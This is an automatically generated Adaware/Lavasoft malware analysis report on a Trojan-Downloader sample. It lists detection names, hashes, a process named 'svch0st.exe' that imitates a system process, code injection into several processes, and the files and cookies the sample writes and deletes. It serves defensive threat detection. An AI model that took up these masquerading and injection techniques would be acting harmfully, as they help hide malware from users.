Gen.Variant.Graftor.101169_5ce023bff6 – Adaware

HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Gen:Variant.Graftor.101169 (B) (Emsisoft), Gen:Variant.Graftor.101169 (AdAware), Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan, Worm, EmailWorm

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 5ce023bff60b4dbb7b7f0574f360735d

SHA1: 2bb62465df3631c0b1e4a5a38a85a8395c8a695a

SHA256: d41912220a296db0adab8d5715e6f9631254f3f94a18af2b0fd000fc053d7b2c

SSDeep: 6144:MeBkqGqO5dUge34e2D61w5qtPruZ/eVapd79WM/F0nBaw:jBwqO5egeotDNuruluaf79D/anY

Size: 413184 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6

Company: no certificate found

Created at: 2016-11-06 17:26:17

Analyzed on: Windows7 SP1 32-bit

Summary: Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Dynamic Analysis

Payload

Behaviour	Description
EmailWorm	Worm can send e-mails.

Process activity

The Trojan creates the following process(es):

svch0st.exe:3204

The Trojan injects its code into the following process(es):

%original file name%.exe:2956
svch0st.exe:3196
svch0st.exe:2080
svch0st.exe:3188
svch0st.exe:2632

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:2956 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\svch0st.exe (742 bytes)

The process svch0st.exe:3196 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\MTFlashStore[1].swf (1048 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\ads6[1].htm (312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ad_cleaner[1].js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\fl[1].js (650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8P2IKO3V.txt (105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\detail[1].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\cfg.ini (152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\myTab[1].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[5].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\TQEXK3AF.txt (292 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KTNO4VM2.txt (123 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\hm[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#irs01.net\settings.sxx (683 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\iwt[2].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Z4OFGSEX.txt (96 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\I5FMQPLV.txt (390 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\z_stat[1].js (1058 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\core[1].js (763 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\os[1].js (59998 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\web[1].htm (273 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\dot[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\6[1].htm (1520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\165VQSMA.txt (158 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\stat[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[4].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\irt[1].js (33 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\empty[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\share[1].js (1096 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LOVKAMR2.txt (112 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\3774651[1].htm (951 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\eb3340e4[1].htm (124 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\hm[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\DOMStore\5XISSK39\ent.onlylady[1].xml (411 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\irs01.net\mt_adtracker.sxx (102 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\hm[3].js (11729 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\cfg.ini (228 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\onlyladyomd_new2[1].htm (98 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[3].gif (86 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\statisddd-min[1].js (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\tools.min[1].js (9530 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\hm[1].js (11987 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\DOMStore\1HUVI2AA\wwwcdn.kimiss[1].xml (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\rclm[1].js (658 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\pv_y[1].js (677 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\search[1].js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\hm[2].js (9448 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\ads6[1].htm (300 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\jquery-1.7.2.min[1].js (39451 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx (554 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\onlyladyomd_new2[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LOVKAMR2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[3].gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\165VQSMA.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Q97SV2MA.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\irs01.net\mt_adtracker.sxx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#irs01.net\settings.sol (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\ads6[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[5].gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\hm[1].gif (0 bytes)

The process svch0st.exe:2080 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\6.5[1].xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\GlobalConfig_6.5[1].ini (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\55ee63603affb1f5f4d8e08f09be352e7da44e172e1384869d76dbf5b725b73695cee9ba28a198bdf5d219f25b7f7d1ea108d4d2513de6c36d2bd1ec2e63b933a620b3493b945ab6763eaba1302ee18996f0 (98 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\log.txt (522 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\blhash.dat.bak (1822 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\blhash_6.5.dat[1].zip (502 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\SearchEngine.ini.bak (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\bl_6.5[1].dat (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\HLR_cfg.ini.bak (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\GlobalConfig.ini.bak (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\cfg.ini (835 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\6.5[1].xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\SearchEngine_6.5[1].ini (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\cfg_6.5[1].ini (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\cfg.ini (720 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\runtask_6.5[1].dat (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\runtask.dat.bak (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\bl.dat.bak (6 bytes)

The process svch0st.exe:3204 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\0ad38a6488686acc96d4ec67497a33b9[1].xml (776 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\crossdomain[1].xml (261 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_cupid.sxx (528 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\crossdomain[1].xml (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9UCBFK7X.txt (1121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\crossdomain[2].xml (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\ugcBodanPlay[1].js (473593 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#www.iqiyi.com\settings.sxx (711 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\DJU0K3WB.txt (110 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SL165LVJ.txt (485 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_settings.sxx (273 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\Tipdatavod_201610311735[1].xml (3615 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\5L8TXOO8.txt (298 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\TH4O9JKH.txt (94 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\crossdomain[2].xml (483 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\beacon[1].js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyiclientflash.sxx (101 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\W16263T6.txt (95 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_statistics.sxx (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\10382a1b82aa[1].swf (9099 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\clear[2].swf (8061 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\52ba69c7b1d54420bec46c52cec587c6[1].js (71885 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\ugcBodanPlay_ver[1].js (122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\irs_ftrack_UV.sxx (104 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\irs_ftrack.sxx (91 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\1823925a82d4[1].swf (1339 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_player_common.sxx (89 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\sea1.2[1].js (123932 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\iwt[1].js (842 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\11.0.1[1].js (104 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\irt[1].js (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\irs_ftrack_0.sxx (314 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\quud[1].htm (203 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\proxy[1].htm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hasnew[1].action (112 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[2].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\crossdomain[3].xml (170 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_log.sxx (66 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\clear[1].swf (11138 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\1050c72eeb6[1].swf (2283 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_histories.sxx (36 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx (541 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\tanxssp[1].js (48533 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\6Y0COW66.txt (70 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\qa[1].js (4082 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\exsites[1].htm (6692 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\D6VJBQU7.txt (114 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\TFExecuter4\cfg.ini (152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\cfg.ini (228 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\tanxssp[1].js (41931 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\787ab6983c8a883fa3c5190ce3cac804[1] (240 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\m[1].htm (372 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\get_msg[1].action (53 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\572044000[1] (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3AYVSTOL.txt (1299 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\pcweb.wonder[1].js (155849 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\1050f98c2359[1].swf (274705 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\DOMStore\WMZUWJRG\www.iqiyi[1].xml (621 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\push[1].js (281 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ex[1].js (1950 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\572044000[1].htm (17 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\737NWARW.txt (875 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\hm[1].gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ares2.min[1].js (49926 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\crossdomain[1].xml (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PYWE1XWT.txt (679 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\mgets[1] (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Q97SV2MA.txt (90 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\peerInfo.sxx (120 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\036300cf212b7b[1].swf (24797 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\online[1].js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3GN6V4AY.txt (287 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\getqd[1].txt (162 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\crossdomain[3].xml (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\C9DWB8JN.txt (109 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\C54EWNSP.txt (679 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\00NB3MLM.txt (112 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\182321793893[1].swf (1821 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\55ZHX71Y.txt (107 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\common[1].js (145204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OHDG2SOX\hm[1].js (13159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\PVQ5QQNA\behavior[1].js (508 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ab77b6ea7f3fbf79[1].js (478 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\videos[1] (19615 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\crossdomain[2].xml (224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_tips_statistics.sxx (797 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\v_19rra3jt70[1].htm (159638 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\AR5IZWJN\_J.1.2.min[1].js (2221 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\S8WLVQD9.txt (1159 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PYWE1XWT.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_statistics.sol (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\D6VJBQU7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_cupid.sxx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\irs_ftrack_UV.sxx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#www.iqiyi.com\settings.sol (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\peerInfo.sxx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\3GN6V4AY.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9UCBFK7X.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\irs_ftrack_0.sol (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\C9DWB8JN.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\C54EWNSP.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_log.sol (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_tips_statistics.sol (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SL165LVJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\ex[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\LSinglePro\Temporary Internet Files\Content.IE5\OLT9W1PH\crossdomain[2].xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\737NWARW.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\NBXZ88BJ\www.iqiyi.com\qiyi_cupid.sol (0 bytes)
